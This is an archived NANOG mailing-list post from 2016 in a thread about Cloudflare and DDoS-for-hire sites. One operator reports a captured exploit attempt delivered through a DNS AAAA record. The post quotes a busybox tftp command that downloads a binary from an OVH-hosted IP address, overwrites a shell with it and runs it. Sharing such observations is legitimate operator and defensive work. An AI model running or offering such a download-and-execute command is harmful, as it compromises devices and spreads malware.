nanog mailing list archives

Re: Cloudflare, dirty networks and politricks

From: Alain Hebert <ahebert () pubnix net>
Date: Mon, 1 Aug 2016 09:41:11 -0400

    While on that subject,

    ( And by pure coincidence )

    Here is a little attempt of exploiting AAAA overflow (dnsmasq maybe)
using OVH as a payload distribution

AAAA cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g
91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh

    Obviously that host is not accessible at the moment. (GG OVH?)

    I'm suspecting that the CC used to create that VM got declined on
the 1st, which is often the case for payload distribution.

-----
Alain Hebert                                ahebert () pubnix net   
PubNIX Inc.        
50 boul. St-Charles
P.O. Box 26770     Beaconsfield, Quebec     H9W 6G7
Tel: 514-990-5911  http://www.pubnix.net    Fax: 514-990-9443

On 08/01/16 07:33, Randy Bush wrote:

so block cloudflare from your network and go back to work already.

What is that supposed to accomplish? Cloudflare will still be helping 
selling DDoS attacks on my network.

No it is not the same as asking Cloudflare to do the sensible thing:

and how is that working out for you?

all that is happening is the subject that won't die is being a dos on
this list (yes, including this response)

randy

Current thread:

Re: Cloudflare, dirty networks and politricks Baldur Norddahl (Aug 01)
- Re: Cloudflare, dirty networks and politricks Randy Bush (Aug 01)
  - Re: Cloudflare, dirty networks and politricks Alain Hebert (Aug 01)
- <Possible follow-ups>
- Re: Cloudflare, dirty networks and politricks John (Aug 01)